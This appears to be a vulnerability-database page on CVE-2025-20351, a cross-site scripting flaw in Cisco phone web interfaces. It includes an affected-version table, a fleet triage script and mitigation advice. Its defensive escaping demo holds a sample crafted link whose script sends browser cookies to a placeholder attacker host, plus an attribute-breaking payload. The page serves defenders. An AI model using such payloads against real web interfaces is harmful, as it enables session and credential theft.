CVE-2025-20351
BaseFortify
Publication date: 2025-10-15
Last updated on: 2025-12-04
Assigner: Cisco Systems, Inc.
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| cisco | desk_phone_9871_firmware | 3.0(1) through 3.2(1), inclusive |
| cisco | desk_phone_9871 | * (any hardware version) |
| cisco | desk_phone_9841_firmware | 3.0(1) through 3.2(1), inclusive |
| cisco | desk_phone_9841 | * (any hardware version) |
| cisco | desk_phone_9851_firmware | 3.0(1) through 3.2(1), inclusive |
| cisco | desk_phone_9851 | * (any hardware version) |
| cisco | desk_phone_9861_firmware | 3.0(1) through 3.2(1), inclusive |
| cisco | desk_phone_9861 | * (any hardware version) |
| cisco | ip_phone_8865_firmware | Up to and including 14.3(1) |
| cisco | ip_phone_8865 | * (any hardware version) |
| cisco | ip_phone_7811_firmware | Up to and including 14.3(1) |
| cisco | ip_phone_7811 | * (any hardware version) |
| cisco | ip_phone_7821_firmware | Up to and including 14.3(1) |
| cisco | ip_phone_7821 | * (any hardware version) |
| cisco | ip_phone_7841_firmware | Up to and including 14.3(1) |
| cisco | ip_phone_7841 | * (any hardware version) |
| cisco | ip_phone_7861_firmware | Up to and including 14.3(1) |
| cisco | ip_phone_7861 | * (any hardware version) |
| cisco | ip_phone_8811_firmware | Up to and including 14.3(1) |
| cisco | ip_phone_8811 | * (any hardware version) |
| cisco | ip_phone_8832_firmware | Up to and including 14.3(1) |
| cisco | ip_phone_8832 | * (any hardware version) |
| cisco | ip_phone_8841_firmware | Up to and including 14.3(1) |
| cisco | ip_phone_8841 | * (any hardware version) |
| cisco | ip_phone_8845_firmware | Up to and including 14.3(1) |
| cisco | ip_phone_8845 | * (any hardware version) |
| cisco | ip_phone_8851_firmware | Up to and including 14.3(1) |
| cisco | ip_phone_8851 | * (any hardware version) |
| cisco | ip_phone_8861_firmware | Up to and including 14.3(1) |
| cisco | ip_phone_8861 | * (any hardware version) |
| cisco | ip_phone_8821_firmware | Up to 11.0(1) (exclusive); 11.0(0.7); 11.0(1); 11.0(2); 11.0(3); 11.0(4); 11.0(5); 11.0(6) |
| cisco | ip_phone_8821 | * (any hardware version) |
| cisco | video_phone_8875_firmware | Up to and including 2.3(1); 3.0(1) through 3.2(1), inclusive |
| cisco | video_phone_8875 | * (any hardware version) |
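The table above is awkward to apply by hand across a phone fleet, because Cisco firmware versions ("14.3(1)", "11.0(0.7)") do not sort as plain strings. The following is an added example, not code from BaseFortify or Cisco: it parses those version strings into comparable tuples, transcribes the affected ranges from the table, and triages a constructed inventory. Two assumptions are made and marked in the code: a service-release suffix such as "SR1" is ignored for comparison (so a phone on "14.3(1)SR1" is flagged for review rather than cleared, since the page does not say how service releases are treated), and the individually listed 8821 releases are consolidated into one range up to and including 11.0(6). The device names in the sample inventory are made up.

```python
import re
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, int, int, int]
# (low, low_inclusive, high, high_inclusive); None means unbounded on that side
Range = Tuple[Optional[Version], bool, Optional[Version], bool]

# Cisco phone firmware versions read "major.minor(maint[.sub])", e.g. "14.3(1)"
# or "11.0(0.7)", sometimes followed by a service-release tag such as "SR1".
_VER_RE = re.compile(r"^(\d+)\.(\d+)\((\d+)(?:\.(\d+))?\)\s*(?:SR\s*\d+)?$", re.IGNORECASE)


def parse_version(text: str) -> Version:
    """Turn a Cisco version string into a tuple that sorts correctly.

    Assumption (the page does not say how service releases are treated): an
    "SRn" suffix is dropped, so "14.3(1)SR1" compares equal to "14.3(1)".
    That flags such a phone for review rather than silently clearing it.
    """
    m = _VER_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Cisco version string: {text!r}")
    major, minor, maint, sub = m.groups()
    return (int(major), int(minor), int(maint), int(sub or 0))


def _rng(low: Optional[str], high: Optional[str],
         low_inc: bool = True, high_inc: bool = True) -> Range:
    return (parse_version(low) if low else None, low_inc,
            parse_version(high) if high else None, high_inc)


# Affected ranges transcribed from the table above. The 8821 entry is
# consolidated from its individually listed releases into one range
# (assumption: nothing between the listed releases is exempt).
_DESK_9800 = [_rng("3.0(1)", "3.2(1)")]
_UP_TO_14_3_1 = [_rng(None, "14.3(1)")]
AFFECTED: Dict[str, List[Range]] = {
    **{f"desk_phone_{m}": _DESK_9800 for m in ("9841", "9851", "9861", "9871")},
    **{f"ip_phone_{m}": _UP_TO_14_3_1 for m in (
        "7811", "7821", "7841", "7861", "8811", "8832", "8841",
        "8845", "8851", "8861", "8865")},
    "ip_phone_8821": [_rng(None, "11.0(6)")],
    "video_phone_8875": [_rng(None, "2.3(1)"), _rng("3.0(1)", "3.2(1)")],
}


def in_range(v: Version, r: Range) -> bool:
    low, low_inc, high, high_inc = r
    if low is not None and (v < low or (v == low and not low_inc)):
        return False
    if high is not None and (v > high or (v == high and not high_inc)):
        return False
    return True


def is_affected(product: str, version: str) -> bool:
    """True if this product/firmware pair falls inside a listed affected range."""
    if product not in AFFECTED:
        raise KeyError(f"{product!r} is not in the affected-product list")
    v = parse_version(version)
    return any(in_range(v, r) for r in AFFECTED[product])


# Constructed inventory for the demo; device names and versions are made up.
SAMPLE_INVENTORY = [
    ("SEP001122334455", "ip_phone_8841", "14.2(1)"),
    ("SEP001122334466", "ip_phone_8841", "14.3(1)SR1"),
    ("SEP001122334477", "desk_phone_9861", "3.2(1)"),
    ("SEP001122334488", "desk_phone_9861", "3.3(1)"),
    ("SEP001122334499", "video_phone_8875", "2.2(1)"),
    ("SEP0011223344AA", "video_phone_8875", "2.4(1)"),
    ("SEP0011223344BB", "ip_phone_8821", "11.0(6)"),
]


def triage(inventory) -> List[Tuple[str, str, str]]:
    """Return the inventory rows whose firmware is in an affected range."""
    return [row for row in inventory if is_affected(row[1], row[2])]


if __name__ == "__main__":
    for name, product, version in triage(SAMPLE_INVENTORY):
        print(f"{name}\t{product}\t{version}\tAFFECTED")
```

Feed it the device name, model and load version exported from Cisco Unified Communications Manager; a phone outside every listed range is not cleared by this script alone, since the page gives affected ranges rather than fixed releases, so confirm the fixed version against Cisco's advisory.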
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is a cross-site scripting (XSS) issue in the web UI of certain Cisco Desk Phones and Video Phones running Cisco SIP Software. It occurs because the web UI does not properly validate user-supplied input, allowing an unauthenticated remote attacker to craft a malicious link that, when clicked by a user, can execute arbitrary script code within the context of the web interface or access sensitive browser-based information.
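The crafted-link mechanism described above is the classic reflected form of CWE-79: a request parameter is copied into the page without being neutralised. The block below is an added, generic illustration, not the phone firmware's code (the phone's real web UI endpoints are not given on this page); the host, path and parameter name are hypothetical and the crafted links are constructed. It shows the unsafe reflection beside the hardened form for both element-content and quoted-attribute contexts, with a crude oracle that checks whether a live `<script>` tag survives.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed crafted links of the kind the advisory text describes. The host,
# path and parameter name are hypothetical; nothing here is a real phone endpoint.
CRAFTED_LINK = (
    "http://phone.example.invalid/status?name="
    "%3Cscript%3Edocument.location%3D%27http%3A//attacker.invalid/%3F%27"
    "%2Bdocument.cookie%3C/script%3E"
)
ATTR_LINK = "http://phone.example.invalid/status?name=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"


def _param(url: str, key: str) -> str:
    """Pull one query parameter out of a URL, percent-decoded."""
    return parse_qs(urlsplit(url).query).get(key, [""])[0]


def render_unsafe(url: str) -> str:
    """'Before': the parameter is reflected into HTML untouched (CWE-79)."""
    return f"<p>Device name: {_param(url, 'name')}</p>"


def render_safe(url: str) -> str:
    """'After': entity-encode for the element-content context before reflecting."""
    return f"<p>Device name: {html.escape(_param(url, 'name'), quote=True)}</p>"


def render_safe_attr(url: str) -> str:
    """Quoted attribute context: quote=True encodes the quotes that would close it."""
    return f'<input type="text" value="{html.escape(_param(url, "name"), quote=True)}">'


_SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def reflects_script(rendered: str) -> bool:
    """Crude oracle: does a live <script> tag survive in the rendered output?"""
    return bool(_SCRIPT_TAG.search(rendered))


if __name__ == "__main__":
    for label, fn in (("unsafe", render_unsafe), ("safe", render_safe)):
        out = fn(CRAFTED_LINK)
        print(f"{label:6} script survives={reflects_script(out)}  {out}")
```

Entity encoding matched to the output context is the fix; `html.escape` covers element content and quoted attributes but not a URL or inline-JavaScript sink, which need their own encoders. A restrictive Content-Security-Policy on an embedded web UI is worthwhile defence in depth but does not replace output encoding.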
How can this vulnerability impact me?
If exploited, this vulnerability allows an attacker to run arbitrary script in the victim's browser session against the affected phone's web UI. That script can read information the web UI exposes to that session or manipulate the interface on the user's behalf, compromising the security and privacy of the user. Exploitation requires the phone to be registered to Cisco Unified Communications Manager and to have Web Access enabled, which is disabled by default, and it requires a user to open a crafted link.
What immediate steps should I take to mitigate this vulnerability?
Disable Web Access on affected phones unless it is genuinely needed: the setting is the per-phone "Web Access" field in the phone's Product Specific Configuration in Cisco Unified Communications Manager (it can also be set in a Common Phone Profile), and it is Disabled by default, so a phone is only exposed where someone turned it on. Where the web UI must stay enabled, upgrade to software outside the affected ranges listed above as Cisco publishes fixed releases, and until then restrict which networks can reach the phones' HTTP/HTTPS ports. Anyone who administers phones through the web UI should not follow links to phone web pages from untrusted email or messages, since exploitation needs a user to open a crafted link.